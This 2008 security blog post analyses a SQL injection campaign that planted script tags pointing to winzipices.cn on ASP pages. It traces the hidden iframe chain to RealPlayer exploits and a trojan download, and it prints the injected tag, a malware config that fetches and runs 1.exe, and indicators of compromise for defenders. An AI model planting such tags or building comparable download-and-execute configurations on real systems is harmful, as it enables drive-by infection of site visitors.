« February 2008 · August 2008 · November 2014 »

April 2008
MonTueWedThuFriSatSun
 010203040506
07080910111213
14151617181920
21222324252627
282930    
May 2008
MonTueWedThuFriSatSun
   01020304
05060708091011
12131415161718
19202122232425
262728293031 
June 2008
MonTueWedThuFriSatSun
      01
02030405060708
09101112131415
16171819202122
23242526272829
30      

Calendar:

Newest first Oldest first

Wednesday, 7 May 2008

New SQL Injection Attacks and New Malware: winzipices.cn


Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC has also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations.

It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here are different than the last few attacks. If your websites has been hacked or you are visiting a hacked website, you will find something like this in your HTML source in the page you visit:

	"<script src=hxxp://winzipices.cn/5.js></script>"

It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn have hidden iframes that we will discuss below.

The Malicious File Trail


Visiting a website injected with winzipices.cn followed by a link to either 1.js, 2.js, 3.js, 4.js, or 5.js results in the following set of requests:

hxxp://winzipices.cn/5.js writes a hidden iframe linking to hxxp://winzipices.cn/5.asp

hxxp://winzipices.cn/5.asp then writes two more hidden iframes:

hxxp://winzipices.cn/s.asp - appears to be an empty file
hxxp://winzipices.cn/pp.htm - References the JavaScript file "/pp.js"

hxxp://winzipices.cn/pp.js - This file checks if your browser is either IE6 or IE7. If your browser's User-Agent is IE6 or IE7 it will attempt to send you to one of the two links via hidden iframes:

hxxp://winzipices.cn/6.gif - IE6 users are sent here and then are sent three different iframes and a JavaScript file:

 -hxxp://winzipices.cn/le.gif - Has a direct link to the malicious binary at hxxp://61.188.38.158/images/test.exe
 -hxxp://winzipices.cn/vv.js
 -hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll 
 -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

hxxp://winzipices.cn/7.gif - IE7 user are sent here and only receive two of the iframes the IE6 users receive:

 -hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll 
 -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

(5.asp also has a JavaScript reference and clickable image related to traffic stats - links not included)

It would appear that successful exploit attempts would result in a file called "test.exe" being download from 61.188.38.158. This just so happens to be the name of the file that was used in the recent attacks involving "nihaorr1.com". However, these are very different binaries.

Another Interesting Discovery


We also noted that requesting invalid files (404 requests) from this server will return two iframes.

hxxp://winzipices.cn/pp.htm - See above as we have already discussed this one
hxxp://winzipices.cn/test.htm - Not what you would expect. This page loads one of the following URL at random:

 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret1.jpg - with alt tag "sex girl"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret8.jpg - with alt tag "my wow account"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret7.jpg - with alt tag "WOW UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret5.jpg - with alt tag "oh god"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg - with alt tag "UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret2.jpg - with alt tag "UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret3.jpg - with alt tag "UI"

These are all images of someone playing World of WarCraft. Not quite sure how this plays into everything or why it is there, but it is quite peculiar.

The Malware


In the most recent attacks we blogged about, the malware installed a password stealer that would grab credentials from systems running Internet Explorer. This is definitely a different piece of malware from the previous attacks and does not appear the first executable is a password stealer. This binary that is download by this attack appears to be part of a kit we have seen in the Chinese malware family for some time now. The first thing this malware does once installed is download a configuration file. This configuration file has several commands and tells the system what to do next. In our instance it tell is to download yet another file and to report in to a URL.

The malware is download from hxxp://61.188.38.158/images/test.exe and then once installed makes the following requests back to winzipices.cn:

hxxp://winzipices.cn/config.txt - GET request for the configuration file
hxxp://winzipices.cn/1.exe - GET requests for a binary to download and execute
hxxp://winzipices.cn/tong/post.asp?anyehorse=COMPUTER_NAME - GET request to report in the system name

The configuration file for this malware looks like this:

---begin config---


Random:
3455*

Down:
hxx://winzipices.cn/1.exe*

FlipWEB:
*

SendGet:
hxxp://winzipices.cn/tong/post.asp*

InfeWeb:
*

NetBiosInfe:
1*

HDInfe:
0*

InfeExe:
0*

RemovInfe:
1*

RemovableDrive:
1*

FixedDrive:
1*

ReadTime:
1*

OpenSys:
1*


---end config---

This is a malware family we have been seeing for some time now. This malware has several different capabilities through the above configuration file to include ARP spoofing to inject malicious code into webpages of users on the LAN.

The file 1.exe that is then installed from this trojan makes continuous outbound requests to 61.134.37.15 on port 1800.

Malware Binaries:

File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes

File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes

Protection & Detection


As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:

-winzipices.cn [60.191.239.229]
-61.188.38.158
-61.134.37.15

Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names.

=>Posted May 07, 2008, at 05:34 AM by Steven Adair